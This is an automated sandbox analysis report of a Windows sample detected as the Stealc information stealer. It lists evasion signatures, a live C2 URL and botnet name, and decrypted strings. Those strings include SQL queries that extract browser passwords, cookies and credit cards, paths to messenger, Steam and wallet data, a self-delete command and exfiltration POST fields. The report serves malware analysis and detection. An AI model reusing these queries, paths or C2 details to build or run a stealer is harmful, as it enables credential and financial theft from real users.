Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1545720
MD5:	e7e67024404f23389e4052996e08923a
SHA1:	7b695a106607d413d657ba1ca50401b03df2fafd
SHA256:	114e599411e6fa14e2231d45e8ad7ccfffcb068cebe1c93ee98094c8a744cecb
Tags:	exeuser-Bitsight
Infos:

Detection

Stealc

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Detected unpacking (changes PE section rights)

Found malware configuration

Suricata IDS alerts for network traffic

Yara detected Powershell download and execute

Yara detected Stealc

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Found evasive API chain (may stop execution after checking locale)

Hides threads from debuggers

Machine Learning detection for sample

PE file contains section with special chars

Sample uses string decryption to hide its real strings

Searches for specific processes (likely to inject)

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Checks for debuggers (devices)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Detected potential crypto function

Entry point lies outside standard sections

Extensive use of GetProcAddress (often used to hide API calls)

Found evaded block containing many API calls

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

PE file contains an invalid checksum

PE file contains sections with non-standard names

Program does not show much activity (idle)

Queries the volume information (name, serial number etc) of a device

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-stealc-cbe5c94b84af	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Signatures

AV Detection

Antivirus / Scanner detection for submitted sample

Source: file.exe

Avira: detected

Found malware configuration

Source: 0.2.file.exe.20000.0.unpack

Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 0.2.file.exe.20000.0.unpack	String decryptor: INSERT_KEY_HERE
Source: 0.2.file.exe.20000.0.unpack	String decryptor: 30
Source: 0.2.file.exe.20000.0.unpack	String decryptor: 11
Source: 0.2.file.exe.20000.0.unpack	String decryptor: 20
Source: 0.2.file.exe.20000.0.unpack	String decryptor: 24
Source: 0.2.file.exe.20000.0.unpack	String decryptor: GetProcAddress
Source: 0.2.file.exe.20000.0.unpack	String decryptor: LoadLibraryA
Source: 0.2.file.exe.20000.0.unpack	String decryptor: lstrcatA
Source: 0.2.file.exe.20000.0.unpack	String decryptor: OpenEventA
Source: 0.2.file.exe.20000.0.unpack	String decryptor: CreateEventA
Source: 0.2.file.exe.20000.0.unpack	String decryptor: CloseHandle
Source: 0.2.file.exe.20000.0.unpack	String decryptor: Sleep
Source: 0.2.file.exe.20000.0.unpack	String decryptor: GetUserDefaultLangID
Source: 0.2.file.exe.20000.0.unpack	String decryptor: VirtualAllocExNuma
Source: 0.2.file.exe.20000.0.unpack	String decryptor: VirtualFree
Source: 0.2.file.exe.20000.0.unpack	String decryptor: GetSystemInfo
Source: 0.2.file.exe.20000.0.unpack	String decryptor: VirtualAlloc
Source: 0.2.file.exe.20000.0.unpack	String decryptor: HeapAlloc
Source: 0.2.file.exe.20000.0.unpack	String decryptor: GetComputerNameA
Source: 0.2.file.exe.20000.0.unpack	String decryptor: lstrcpyA
Source: 0.2.file.exe.20000.0.unpack	String decryptor: GetProcessHeap
Source: 0.2.file.exe.20000.0.unpack	String decryptor: GetCurrentProcess
Source: 0.2.file.exe.20000.0.unpack	String decryptor: lstrlenA
Source: 0.2.file.exe.20000.0.unpack	String decryptor: ExitProcess
Source: 0.2.file.exe.20000.0.unpack	String decryptor: GlobalMemoryStatusEx
Source: 0.2.file.exe.20000.0.unpack	String decryptor: GetSystemTime
Source: 0.2.file.exe.20000.0.unpack	String decryptor: SystemTimeToFileTime
Source: 0.2.file.exe.20000.0.unpack	String decryptor: advapi32.dll
Source: 0.2.file.exe.20000.0.unpack	String decryptor: gdi32.dll
Source: 0.2.file.exe.20000.0.unpack	String decryptor: user32.dll
Source: 0.2.file.exe.20000.0.unpack	String decryptor: crypt32.dll
Source: 0.2.file.exe.20000.0.unpack	String decryptor: ntdll.dll
Source: 0.2.file.exe.20000.0.unpack	String decryptor: GetUserNameA
Source: 0.2.file.exe.20000.0.unpack	String decryptor: CreateDCA
Source: 0.2.file.exe.20000.0.unpack	String decryptor: GetDeviceCaps
Source: 0.2.file.exe.20000.0.unpack	String decryptor: ReleaseDC
Source: 0.2.file.exe.20000.0.unpack	String decryptor: CryptStringToBinaryA
Source: 0.2.file.exe.20000.0.unpack	String decryptor: sscanf
Source: 0.2.file.exe.20000.0.unpack	String decryptor: VMwareVMware
Source: 0.2.file.exe.20000.0.unpack	String decryptor: HAL9TH
Source: 0.2.file.exe.20000.0.unpack	String decryptor: JohnDoe
Source: 0.2.file.exe.20000.0.unpack	String decryptor: DISPLAY
Source: 0.2.file.exe.20000.0.unpack	String decryptor: %hu/%hu/%hu
Source: 0.2.file.exe.20000.0.unpack	String decryptor: http://185.215.113.206
Source: 0.2.file.exe.20000.0.unpack	String decryptor: bksvnsj
Source: 0.2.file.exe.20000.0.unpack	String decryptor: /6c4adf523b719729.php
Source: 0.2.file.exe.20000.0.unpack	String decryptor: /746f34465cf17784/
Source: 0.2.file.exe.20000.0.unpack	String decryptor: tale
Source: 0.2.file.exe.20000.0.unpack	String decryptor: GetEnvironmentVariableA
Source: 0.2.file.exe.20000.0.unpack	String decryptor: GetFileAttributesA
Source: 0.2.file.exe.20000.0.unpack	String decryptor: GlobalLock
Source: 0.2.file.exe.20000.0.unpack	String decryptor: HeapFree
Source: 0.2.file.exe.20000.0.unpack	String decryptor: GetFileSize
Source: 0.2.file.exe.20000.0.unpack	String decryptor: GlobalSize
Source: 0.2.file.exe.20000.0.unpack	String decryptor: CreateToolhelp32Snapshot
Source: 0.2.file.exe.20000.0.unpack	String decryptor: IsWow64Process
Source: 0.2.file.exe.20000.0.unpack	String decryptor: Process32Next
Source: 0.2.file.exe.20000.0.unpack	String decryptor: GetLocalTime
Source: 0.2.file.exe.20000.0.unpack	String decryptor: FreeLibrary
Source: 0.2.file.exe.20000.0.unpack	String decryptor: GetTimeZoneInformation
Source: 0.2.file.exe.20000.0.unpack	String decryptor: GetSystemPowerStatus
Source: 0.2.file.exe.20000.0.unpack	String decryptor: GetVolumeInformationA
Source: 0.2.file.exe.20000.0.unpack	String decryptor: GetWindowsDirectoryA
Source: 0.2.file.exe.20000.0.unpack	String decryptor: Process32First
Source: 0.2.file.exe.20000.0.unpack	String decryptor: GetLocaleInfoA
Source: 0.2.file.exe.20000.0.unpack	String decryptor: GetUserDefaultLocaleName
Source: 0.2.file.exe.20000.0.unpack	String decryptor: GetModuleFileNameA
Source: 0.2.file.exe.20000.0.unpack	String decryptor: DeleteFileA
Source: 0.2.file.exe.20000.0.unpack	String decryptor: FindNextFileA
Source: 0.2.file.exe.20000.0.unpack	String decryptor: LocalFree
Source: 0.2.file.exe.20000.0.unpack	String decryptor: FindClose
Source: 0.2.file.exe.20000.0.unpack	String decryptor: SetEnvironmentVariableA
Source: 0.2.file.exe.20000.0.unpack	String decryptor: LocalAlloc
Source: 0.2.file.exe.20000.0.unpack	String decryptor: GetFileSizeEx
Source: 0.2.file.exe.20000.0.unpack	String decryptor: ReadFile
Source: 0.2.file.exe.20000.0.unpack	String decryptor: SetFilePointer
Source: 0.2.file.exe.20000.0.unpack	String decryptor: WriteFile
Source: 0.2.file.exe.20000.0.unpack	String decryptor: CreateFileA
Source: 0.2.file.exe.20000.0.unpack	String decryptor: FindFirstFileA
Source: 0.2.file.exe.20000.0.unpack	String decryptor: CopyFileA
Source: 0.2.file.exe.20000.0.unpack	String decryptor: VirtualProtect
Source: 0.2.file.exe.20000.0.unpack	String decryptor: GetLogicalProcessorInformationEx
Source: 0.2.file.exe.20000.0.unpack	String decryptor: GetLastError
Source: 0.2.file.exe.20000.0.unpack	String decryptor: lstrcpynA
Source: 0.2.file.exe.20000.0.unpack	String decryptor: MultiByteToWideChar
Source: 0.2.file.exe.20000.0.unpack	String decryptor: GlobalFree
Source: 0.2.file.exe.20000.0.unpack	String decryptor: WideCharToMultiByte
Source: 0.2.file.exe.20000.0.unpack	String decryptor: GlobalAlloc
Source: 0.2.file.exe.20000.0.unpack	String decryptor: OpenProcess
Source: 0.2.file.exe.20000.0.unpack	String decryptor: TerminateProcess
Source: 0.2.file.exe.20000.0.unpack	String decryptor: GetCurrentProcessId
Source: 0.2.file.exe.20000.0.unpack	String decryptor: gdiplus.dll
Source: 0.2.file.exe.20000.0.unpack	String decryptor: ole32.dll
Source: 0.2.file.exe.20000.0.unpack	String decryptor: bcrypt.dll
Source: 0.2.file.exe.20000.0.unpack	String decryptor: wininet.dll
Source: 0.2.file.exe.20000.0.unpack	String decryptor: shlwapi.dll
Source: 0.2.file.exe.20000.0.unpack	String decryptor: shell32.dll
Source: 0.2.file.exe.20000.0.unpack	String decryptor: psapi.dll
Source: 0.2.file.exe.20000.0.unpack	String decryptor: rstrtmgr.dll
Source: 0.2.file.exe.20000.0.unpack	String decryptor: CreateCompatibleBitmap
Source: 0.2.file.exe.20000.0.unpack	String decryptor: SelectObject
Source: 0.2.file.exe.20000.0.unpack	String decryptor: BitBlt
Source: 0.2.file.exe.20000.0.unpack	String decryptor: DeleteObject
Source: 0.2.file.exe.20000.0.unpack	String decryptor: CreateCompatibleDC
Source: 0.2.file.exe.20000.0.unpack	String decryptor: GdipGetImageEncodersSize
Source: 0.2.file.exe.20000.0.unpack	String decryptor: GdipGetImageEncoders
Source: 0.2.file.exe.20000.0.unpack	String decryptor: GdipCreateBitmapFromHBITMAP
Source: 0.2.file.exe.20000.0.unpack	String decryptor: GdiplusStartup
Source: 0.2.file.exe.20000.0.unpack	String decryptor: GdiplusShutdown
Source: 0.2.file.exe.20000.0.unpack	String decryptor: GdipSaveImageToStream
Source: 0.2.file.exe.20000.0.unpack	String decryptor: GdipDisposeImage
Source: 0.2.file.exe.20000.0.unpack	String decryptor: GdipFree
Source: 0.2.file.exe.20000.0.unpack	String decryptor: GetHGlobalFromStream
Source: 0.2.file.exe.20000.0.unpack	String decryptor: CreateStreamOnHGlobal
Source: 0.2.file.exe.20000.0.unpack	String decryptor: CoUninitialize
Source: 0.2.file.exe.20000.0.unpack	String decryptor: CoInitialize
Source: 0.2.file.exe.20000.0.unpack	String decryptor: CoCreateInstance
Source: 0.2.file.exe.20000.0.unpack	String decryptor: BCryptGenerateSymmetricKey
Source: 0.2.file.exe.20000.0.unpack	String decryptor: BCryptCloseAlgorithmProvider
Source: 0.2.file.exe.20000.0.unpack	String decryptor: BCryptDecrypt
Source: 0.2.file.exe.20000.0.unpack	String decryptor: BCryptSetProperty
Source: 0.2.file.exe.20000.0.unpack	String decryptor: BCryptDestroyKey
Source: 0.2.file.exe.20000.0.unpack	String decryptor: BCryptOpenAlgorithmProvider
Source: 0.2.file.exe.20000.0.unpack	String decryptor: GetWindowRect
Source: 0.2.file.exe.20000.0.unpack	String decryptor: GetDesktopWindow
Source: 0.2.file.exe.20000.0.unpack	String decryptor: GetDC
Source: 0.2.file.exe.20000.0.unpack	String decryptor: CloseWindow
Source: 0.2.file.exe.20000.0.unpack	String decryptor: wsprintfA
Source: 0.2.file.exe.20000.0.unpack	String decryptor: EnumDisplayDevicesA
Source: 0.2.file.exe.20000.0.unpack	String decryptor: GetKeyboardLayoutList
Source: 0.2.file.exe.20000.0.unpack	String decryptor: CharToOemW
Source: 0.2.file.exe.20000.0.unpack	String decryptor: wsprintfW
Source: 0.2.file.exe.20000.0.unpack	String decryptor: RegQueryValueExA
Source: 0.2.file.exe.20000.0.unpack	String decryptor: RegEnumKeyExA
Source: 0.2.file.exe.20000.0.unpack	String decryptor: RegOpenKeyExA
Source: 0.2.file.exe.20000.0.unpack	String decryptor: RegCloseKey
Source: 0.2.file.exe.20000.0.unpack	String decryptor: RegEnumValueA
Source: 0.2.file.exe.20000.0.unpack	String decryptor: CryptBinaryToStringA
Source: 0.2.file.exe.20000.0.unpack	String decryptor: CryptUnprotectData
Source: 0.2.file.exe.20000.0.unpack	String decryptor: SHGetFolderPathA
Source: 0.2.file.exe.20000.0.unpack	String decryptor: ShellExecuteExA
Source: 0.2.file.exe.20000.0.unpack	String decryptor: InternetOpenUrlA
Source: 0.2.file.exe.20000.0.unpack	String decryptor: InternetConnectA
Source: 0.2.file.exe.20000.0.unpack	String decryptor: InternetCloseHandle
Source: 0.2.file.exe.20000.0.unpack	String decryptor: InternetOpenA
Source: 0.2.file.exe.20000.0.unpack	String decryptor: HttpSendRequestA
Source: 0.2.file.exe.20000.0.unpack	String decryptor: HttpOpenRequestA
Source: 0.2.file.exe.20000.0.unpack	String decryptor: InternetReadFile
Source: 0.2.file.exe.20000.0.unpack	String decryptor: InternetCrackUrlA
Source: 0.2.file.exe.20000.0.unpack	String decryptor: StrCmpCA
Source: 0.2.file.exe.20000.0.unpack	String decryptor: StrStrA
Source: 0.2.file.exe.20000.0.unpack	String decryptor: StrCmpCW
Source: 0.2.file.exe.20000.0.unpack	String decryptor: PathMatchSpecA
Source: 0.2.file.exe.20000.0.unpack	String decryptor: GetModuleFileNameExA
Source: 0.2.file.exe.20000.0.unpack	String decryptor: RmStartSession
Source: 0.2.file.exe.20000.0.unpack	String decryptor: RmRegisterResources
Source: 0.2.file.exe.20000.0.unpack	String decryptor: RmGetList
Source: 0.2.file.exe.20000.0.unpack	String decryptor: RmEndSession
Source: 0.2.file.exe.20000.0.unpack	String decryptor: sqlite3_open
Source: 0.2.file.exe.20000.0.unpack	String decryptor: sqlite3_prepare_v2
Source: 0.2.file.exe.20000.0.unpack	String decryptor: sqlite3_step
Source: 0.2.file.exe.20000.0.unpack	String decryptor: sqlite3_column_text
Source: 0.2.file.exe.20000.0.unpack	String decryptor: sqlite3_finalize
Source: 0.2.file.exe.20000.0.unpack	String decryptor: sqlite3_close
Source: 0.2.file.exe.20000.0.unpack	String decryptor: sqlite3_column_bytes
Source: 0.2.file.exe.20000.0.unpack	String decryptor: sqlite3_column_blob
Source: 0.2.file.exe.20000.0.unpack	String decryptor: encrypted_key
Source: 0.2.file.exe.20000.0.unpack	String decryptor: PATH
Source: 0.2.file.exe.20000.0.unpack	String decryptor: C:\ProgramData\nss3.dll
Source: 0.2.file.exe.20000.0.unpack	String decryptor: NSS_Init
Source: 0.2.file.exe.20000.0.unpack	String decryptor: NSS_Shutdown
Source: 0.2.file.exe.20000.0.unpack	String decryptor: PK11_GetInternalKeySlot
Source: 0.2.file.exe.20000.0.unpack	String decryptor: PK11_FreeSlot
Source: 0.2.file.exe.20000.0.unpack	String decryptor: PK11_Authenticate
Source: 0.2.file.exe.20000.0.unpack	String decryptor: PK11SDR_Decrypt
Source: 0.2.file.exe.20000.0.unpack	String decryptor: C:\ProgramData\
Source: 0.2.file.exe.20000.0.unpack	String decryptor: SELECT origin_url, username_value, password_value FROM logins
Source: 0.2.file.exe.20000.0.unpack	String decryptor: browser:
Source: 0.2.file.exe.20000.0.unpack	String decryptor: profile:
Source: 0.2.file.exe.20000.0.unpack	String decryptor: url:
Source: 0.2.file.exe.20000.0.unpack	String decryptor: login:
Source: 0.2.file.exe.20000.0.unpack	String decryptor: password:
Source: 0.2.file.exe.20000.0.unpack	String decryptor: Opera
Source: 0.2.file.exe.20000.0.unpack	String decryptor: OperaGX
Source: 0.2.file.exe.20000.0.unpack	String decryptor: Network
Source: 0.2.file.exe.20000.0.unpack	String decryptor: cookies
Source: 0.2.file.exe.20000.0.unpack	String decryptor: .txt
Source: 0.2.file.exe.20000.0.unpack	String decryptor: SELECT HOST_KEY, is_httponly, path, is_secure, (expires_utc/1000000)-11644480800, name, encrypted_value from cookies
Source: 0.2.file.exe.20000.0.unpack	String decryptor: TRUE
Source: 0.2.file.exe.20000.0.unpack	String decryptor: FALSE
Source: 0.2.file.exe.20000.0.unpack	String decryptor: autofill
Source: 0.2.file.exe.20000.0.unpack	String decryptor: SELECT name, value FROM autofill
Source: 0.2.file.exe.20000.0.unpack	String decryptor: history
Source: 0.2.file.exe.20000.0.unpack	String decryptor: SELECT url FROM urls LIMIT 1000
Source: 0.2.file.exe.20000.0.unpack	String decryptor: cc
Source: 0.2.file.exe.20000.0.unpack	String decryptor: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
Source: 0.2.file.exe.20000.0.unpack	String decryptor: name:
Source: 0.2.file.exe.20000.0.unpack	String decryptor: month:
Source: 0.2.file.exe.20000.0.unpack	String decryptor: year:
Source: 0.2.file.exe.20000.0.unpack	String decryptor: card:
Source: 0.2.file.exe.20000.0.unpack	String decryptor: Cookies
Source: 0.2.file.exe.20000.0.unpack	String decryptor: Login Data
Source: 0.2.file.exe.20000.0.unpack	String decryptor: Web Data
Source: 0.2.file.exe.20000.0.unpack	String decryptor: History
Source: 0.2.file.exe.20000.0.unpack	String decryptor: logins.json
Source: 0.2.file.exe.20000.0.unpack	String decryptor: formSubmitURL
Source: 0.2.file.exe.20000.0.unpack	String decryptor: usernameField
Source: 0.2.file.exe.20000.0.unpack	String decryptor: encryptedUsername
Source: 0.2.file.exe.20000.0.unpack	String decryptor: encryptedPassword
Source: 0.2.file.exe.20000.0.unpack	String decryptor: guid
Source: 0.2.file.exe.20000.0.unpack	String decryptor: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
Source: 0.2.file.exe.20000.0.unpack	String decryptor: SELECT fieldname, value FROM moz_formhistory
Source: 0.2.file.exe.20000.0.unpack	String decryptor: SELECT url FROM moz_places LIMIT 1000
Source: 0.2.file.exe.20000.0.unpack	String decryptor: cookies.sqlite
Source: 0.2.file.exe.20000.0.unpack	String decryptor: formhistory.sqlite
Source: 0.2.file.exe.20000.0.unpack	String decryptor: places.sqlite
Source: 0.2.file.exe.20000.0.unpack	String decryptor: plugins
Source: 0.2.file.exe.20000.0.unpack	String decryptor: Local Extension Settings
Source: 0.2.file.exe.20000.0.unpack	String decryptor: Sync Extension Settings
Source: 0.2.file.exe.20000.0.unpack	String decryptor: IndexedDB
Source: 0.2.file.exe.20000.0.unpack	String decryptor: Opera Stable
Source: 0.2.file.exe.20000.0.unpack	String decryptor: Opera GX Stable
Source: 0.2.file.exe.20000.0.unpack	String decryptor: CURRENT
Source: 0.2.file.exe.20000.0.unpack	String decryptor: chrome-extension_
Source: 0.2.file.exe.20000.0.unpack	String decryptor: _0.indexeddb.leveldb
Source: 0.2.file.exe.20000.0.unpack	String decryptor: Local State
Source: 0.2.file.exe.20000.0.unpack	String decryptor: profiles.ini
Source: 0.2.file.exe.20000.0.unpack	String decryptor: chrome
Source: 0.2.file.exe.20000.0.unpack	String decryptor: opera
Source: 0.2.file.exe.20000.0.unpack	String decryptor: firefox
Source: 0.2.file.exe.20000.0.unpack	String decryptor: wallets
Source: 0.2.file.exe.20000.0.unpack	String decryptor: %08lX%04lX%lu
Source: 0.2.file.exe.20000.0.unpack	String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 0.2.file.exe.20000.0.unpack	String decryptor: ProductName
Source: 0.2.file.exe.20000.0.unpack	String decryptor: x32
Source: 0.2.file.exe.20000.0.unpack	String decryptor: x64
Source: 0.2.file.exe.20000.0.unpack	String decryptor: %d/%d/%d %d:%d:%d
Source: 0.2.file.exe.20000.0.unpack	String decryptor: HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: 0.2.file.exe.20000.0.unpack	String decryptor: ProcessorNameString
Source: 0.2.file.exe.20000.0.unpack	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: 0.2.file.exe.20000.0.unpack	String decryptor: DisplayName
Source: 0.2.file.exe.20000.0.unpack	String decryptor: DisplayVersion
Source: 0.2.file.exe.20000.0.unpack	String decryptor: Network Info:
Source: 0.2.file.exe.20000.0.unpack	String decryptor: - IP: IP?
Source: 0.2.file.exe.20000.0.unpack	String decryptor: - Country: ISO?
Source: 0.2.file.exe.20000.0.unpack	String decryptor: System Summary:
Source: 0.2.file.exe.20000.0.unpack	String decryptor: - HWID:
Source: 0.2.file.exe.20000.0.unpack	String decryptor: - OS:
Source: 0.2.file.exe.20000.0.unpack	String decryptor: - Architecture:
Source: 0.2.file.exe.20000.0.unpack	String decryptor: - UserName:
Source: 0.2.file.exe.20000.0.unpack	String decryptor: - Computer Name:
Source: 0.2.file.exe.20000.0.unpack	String decryptor: - Local Time:
Source: 0.2.file.exe.20000.0.unpack	String decryptor: - UTC:
Source: 0.2.file.exe.20000.0.unpack	String decryptor: - Language:
Source: 0.2.file.exe.20000.0.unpack	String decryptor: - Keyboards:
Source: 0.2.file.exe.20000.0.unpack	String decryptor: - Laptop:
Source: 0.2.file.exe.20000.0.unpack	String decryptor: - Running Path:
Source: 0.2.file.exe.20000.0.unpack	String decryptor: - CPU:
Source: 0.2.file.exe.20000.0.unpack	String decryptor: - Threads:
Source: 0.2.file.exe.20000.0.unpack	String decryptor: - Cores:
Source: 0.2.file.exe.20000.0.unpack	String decryptor: - RAM:
Source: 0.2.file.exe.20000.0.unpack	String decryptor: - Display Resolution:
Source: 0.2.file.exe.20000.0.unpack	String decryptor: - GPU:
Source: 0.2.file.exe.20000.0.unpack	String decryptor: User Agents:
Source: 0.2.file.exe.20000.0.unpack	String decryptor: Installed Apps:
Source: 0.2.file.exe.20000.0.unpack	String decryptor: All Users:
Source: 0.2.file.exe.20000.0.unpack	String decryptor: Current User:
Source: 0.2.file.exe.20000.0.unpack	String decryptor: Process List:
Source: 0.2.file.exe.20000.0.unpack	String decryptor: system_info.txt
Source: 0.2.file.exe.20000.0.unpack	String decryptor: freebl3.dll
Source: 0.2.file.exe.20000.0.unpack	String decryptor: mozglue.dll
Source: 0.2.file.exe.20000.0.unpack	String decryptor: msvcp140.dll
Source: 0.2.file.exe.20000.0.unpack	String decryptor: nss3.dll
Source: 0.2.file.exe.20000.0.unpack	String decryptor: softokn3.dll
Source: 0.2.file.exe.20000.0.unpack	String decryptor: vcruntime140.dll
Source: 0.2.file.exe.20000.0.unpack	String decryptor: \Temp\
Source: 0.2.file.exe.20000.0.unpack	String decryptor: .exe
Source: 0.2.file.exe.20000.0.unpack	String decryptor: runas
Source: 0.2.file.exe.20000.0.unpack	String decryptor: open
Source: 0.2.file.exe.20000.0.unpack	String decryptor: /c start
Source: 0.2.file.exe.20000.0.unpack	String decryptor: %DESKTOP%
Source: 0.2.file.exe.20000.0.unpack	String decryptor: %APPDATA%
Source: 0.2.file.exe.20000.0.unpack	String decryptor: %LOCALAPPDATA%
Source: 0.2.file.exe.20000.0.unpack	String decryptor: %USERPROFILE%
Source: 0.2.file.exe.20000.0.unpack	String decryptor: %DOCUMENTS%
Source: 0.2.file.exe.20000.0.unpack	String decryptor: %PROGRAMFILES%
Source: 0.2.file.exe.20000.0.unpack	String decryptor: %PROGRAMFILES_86%
Source: 0.2.file.exe.20000.0.unpack	String decryptor: %RECENT%
Source: 0.2.file.exe.20000.0.unpack	String decryptor: *.lnk
Source: 0.2.file.exe.20000.0.unpack	String decryptor: files
Source: 0.2.file.exe.20000.0.unpack	String decryptor: \discord\
Source: 0.2.file.exe.20000.0.unpack	String decryptor: \Local Storage\leveldb\CURRENT
Source: 0.2.file.exe.20000.0.unpack	String decryptor: \Local Storage\leveldb
Source: 0.2.file.exe.20000.0.unpack	String decryptor: \Telegram Desktop\
Source: 0.2.file.exe.20000.0.unpack	String decryptor: key_datas
Source: 0.2.file.exe.20000.0.unpack	String decryptor: D877F783D5D3EF8C*
Source: 0.2.file.exe.20000.0.unpack	String decryptor: map*
Source: 0.2.file.exe.20000.0.unpack	String decryptor: A7FDF864FBC10B77*
Source: 0.2.file.exe.20000.0.unpack	String decryptor: A92DAA6EA6F891F2*
Source: 0.2.file.exe.20000.0.unpack	String decryptor: F8806DD0C461824F*
Source: 0.2.file.exe.20000.0.unpack	String decryptor: Telegram
Source: 0.2.file.exe.20000.0.unpack	String decryptor: Tox
Source: 0.2.file.exe.20000.0.unpack	String decryptor: *.tox
Source: 0.2.file.exe.20000.0.unpack	String decryptor: *.ini
Source: 0.2.file.exe.20000.0.unpack	String decryptor: Password
Source: 0.2.file.exe.20000.0.unpack	String decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.file.exe.20000.0.unpack	String decryptor: Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.file.exe.20000.0.unpack	String decryptor: Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.file.exe.20000.0.unpack	String decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.file.exe.20000.0.unpack	String decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.file.exe.20000.0.unpack	String decryptor: oftware\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.file.exe.20000.0.unpack	String decryptor: 00000001
Source: 0.2.file.exe.20000.0.unpack	String decryptor: 00000002
Source: 0.2.file.exe.20000.0.unpack	String decryptor: 00000003
Source: 0.2.file.exe.20000.0.unpack	String decryptor: 00000004
Source: 0.2.file.exe.20000.0.unpack	String decryptor: \Outlook\accounts.txt
Source: 0.2.file.exe.20000.0.unpack	String decryptor: Pidgin
Source: 0.2.file.exe.20000.0.unpack	String decryptor: \.purple\
Source: 0.2.file.exe.20000.0.unpack	String decryptor: accounts.xml
Source: 0.2.file.exe.20000.0.unpack	String decryptor: dQw4w9WgXcQ
Source: 0.2.file.exe.20000.0.unpack	String decryptor: token:
Source: 0.2.file.exe.20000.0.unpack	String decryptor: Software\Valve\Steam
Source: 0.2.file.exe.20000.0.unpack	String decryptor: SteamPath
Source: 0.2.file.exe.20000.0.unpack	String decryptor: \config\
Source: 0.2.file.exe.20000.0.unpack	String decryptor: ssfn*
Source: 0.2.file.exe.20000.0.unpack	String decryptor: config.vdf
Source: 0.2.file.exe.20000.0.unpack	String decryptor: DialogConfig.vdf
Source: 0.2.file.exe.20000.0.unpack	String decryptor: DialogConfigOverlay*.vdf
Source: 0.2.file.exe.20000.0.unpack	String decryptor: libraryfolders.vdf
Source: 0.2.file.exe.20000.0.unpack	String decryptor: loginusers.vdf
Source: 0.2.file.exe.20000.0.unpack	String decryptor: \Steam\
Source: 0.2.file.exe.20000.0.unpack	String decryptor: sqlite3.dll
Source: 0.2.file.exe.20000.0.unpack	String decryptor: browsers
Source: 0.2.file.exe.20000.0.unpack	String decryptor: done
Source: 0.2.file.exe.20000.0.unpack	String decryptor: soft
Source: 0.2.file.exe.20000.0.unpack	String decryptor: \Discord\tokens.txt
Source: 0.2.file.exe.20000.0.unpack	String decryptor: /c timeout /t 5 & del /f /q "
Source: 0.2.file.exe.20000.0.unpack	String decryptor: " & del "C:\ProgramData\*.dll"" & exit
Source: 0.2.file.exe.20000.0.unpack	String decryptor: C:\Windows\system32\cmd.exe
Source: 0.2.file.exe.20000.0.unpack	String decryptor: https
Source: 0.2.file.exe.20000.0.unpack	String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 0.2.file.exe.20000.0.unpack	String decryptor: POST
Source: 0.2.file.exe.20000.0.unpack	String decryptor: HTTP/1.1
Source: 0.2.file.exe.20000.0.unpack	String decryptor: Content-Disposition: form-data; name="
Source: 0.2.file.exe.20000.0.unpack	String decryptor: hwid
Source: 0.2.file.exe.20000.0.unpack	String decryptor: build
Source: 0.2.file.exe.20000.0.unpack	String decryptor: token
Source: 0.2.file.exe.20000.0.unpack	String decryptor: file_name
Source: 0.2.file.exe.20000.0.unpack	String decryptor: file
Source: 0.2.file.exe.20000.0.unpack	String decryptor: message
